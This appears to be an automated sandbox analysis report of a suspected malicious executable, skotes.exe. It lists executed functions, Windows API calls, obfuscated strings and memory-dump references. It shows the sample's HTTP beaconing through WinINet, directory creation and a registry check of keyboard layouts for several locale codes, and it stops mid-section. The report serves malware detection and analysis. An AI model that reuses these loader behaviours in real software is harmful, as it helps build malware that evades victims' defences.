Analysis Process: skotes.exePID: 7804, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1053
Total number of Limit Nodes:	93

Executed Functions

Function 0095E530 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 998
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WTw=, xrefs: 0096097D
MGE+, xrefs: 0095E821
GnNoc2Hc, xrefs: 0095E56C
111, xrefs: 0095F7A0
UA==, xrefs: 0095EB0F, 0095ED56
#, xrefs: 00960624
246122658369, xrefs: 0095F737, 0095FA14, 009605E7, 0096099A
9c9aa5, xrefs: 0095FB8E
MQ==, xrefs: 0095E592
WDw=, xrefs: 0095F71D, 0095F9FA
WTs=, xrefs: 009605CA

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
API String ID: 0-2571795437
Opcode ID: b0f971001256a810838cb4ca6ba81fd30c1c835a4ba5c59a9dd6ae187f4f1b3c
Instruction ID: a40179f053af67d27008b0a4847d878f41bb3df47f18d70383214a1732031296
Opcode Fuzzy Hash: b0f971001256a810838cb4ca6ba81fd30c1c835a4ba5c59a9dd6ae187f4f1b3c
Instruction Fuzzy Hash: 9D82E570904288DBEF14EF68C9597DEBFB5EB46308F508588E805673C2D7759A88CBD2

Function 009565E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00956680

Strings

RySfdMLx, xrefs: 0095669C
GSTmfV==, xrefs: 00956728
ISNmfV==, xrefs: 009567D1

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GSTmfV==$ISNmfV==$RySfdMLx
API String ID: 1484870144-2309319047
Opcode ID: 6e8b3ae613b556efa295cd8eacfc9e527048134312663811d0df2f4f3a672d62
Instruction ID: 267208428897db03da22f9bc8682bba5bef9b34f806a572e8358abc00dd77a9d
Opcode Fuzzy Hash: 6e8b3ae613b556efa295cd8eacfc9e527048134312663811d0df2f4f3a672d62
Instruction Fuzzy Hash: D491C6B1A001189BDB28DF24CC95BDDB779EB85304F8045EDE91997282DB309BC8CFA5

Function 0095EB4E Relevance: 30.1, APIs: 3, Strings: 13, Instructions: 2131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095EB51
CreateDirectoryA.KERNEL32(00000000), ref: 0095EC83
GetFileAttributesA.KERNEL32(00000000), ref: 0095ED98

Strings

invalid stoi argument, xrefs: 009608B0
FisgLnsCZO1i, xrefs: 0095FF19
WTs=, xrefs: 009605CA
111, xrefs: 0095F7A0
UA==, xrefs: 0095EC41, 0095ED56, 0095EF89, 0095F2CE
#, xrefs: 00960624
246122658369, xrefs: 0095F737, 0095FA14, 0095FE00, 009605E7
stoi argument out of range, xrefs: 009608C4
GiQaT29tduF=, xrefs: 0095FEB6
mxo1L0x, xrefs: 0095EE84
9c9aa5, xrefs: 0095FB8E
FCQgKF==, xrefs: 0095FEE4
WDw=, xrefs: 0095F71D, 0095F9FA, 0095FDE3

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesFile$CreateDirectory
String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
API String ID: 1875963930-2267310118
Opcode ID: b29d3b70954d2a53dce9cb16abcf91f5e9571df4118fe41b52072d91a82a9cb6
Instruction ID: b7438e2abae03885c753594df896fb67b50a5afcbc349af2857cb0fe7c37b68b
Opcode Fuzzy Hash: b29d3b70954d2a53dce9cb16abcf91f5e9571df4118fe41b52072d91a82a9cb6
Instruction Fuzzy Hash: 82F26B71A001489BEF18DF38CD9979EBB76AFC1314F108298E849A73D6DB359BC48B51

Function 0095BE30 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,031FA665,?,00000000), ref: 0095BEB8
InternetOpenW.WININET(009A8DC8,00000000,00000000,00000000,00000000), ref: 0095BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0095BEEC
HttpOpenRequestA.WININET(?,00000000), ref: 0095BF36
HttpSendRequestA.WININET(?,00000000), ref: 0095BFF5
InternetReadFile.WININET(?,?,000003FF,?), ref: 0095C0A8
InternetCloseHandle.WININET(?), ref: 0095C187
InternetCloseHandle.WININET(?), ref: 0095C18F
InternetCloseHandle.WININET(?), ref: 0095C197

Strings

8HJUeIfzLo==, xrefs: 0095C3CB, 0095C623
8HJUeMD Lq5=, xrefs: 0095C465
invalid stoi argument, xrefs: 0095E4F4
stoi argument out of range, xrefs: 0095E4EA
RE1NXF==, xrefs: 0095BF0E

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-885246636
Opcode ID: f7e73536ce294dd70823fa6bae637ba6cb3951ac75ad2687a9905862f5626a0d
Instruction ID: cac15c2c18fbd9a9eae983e392468be595ddeaa9e20c54eaece0aae66ac75140
Opcode Fuzzy Hash: f7e73536ce294dd70823fa6bae637ba6cb3951ac75ad2687a9905862f5626a0d
Instruction Fuzzy Hash: 09B1D3B1A002189FDB24DF29CC84B9EBB69EF85305F508199F909972D2DB709AC4CF95

Function 00956020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0095617D
RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00956271

Strings

00000419, xrefs: 00956098
Keyboard Layout\Preload, xrefs: 00956054
00000423, xrefs: 009560FA
0000043f, xrefs: 0095612B
00000422, xrefs: 009560C9

Memory Dump Source

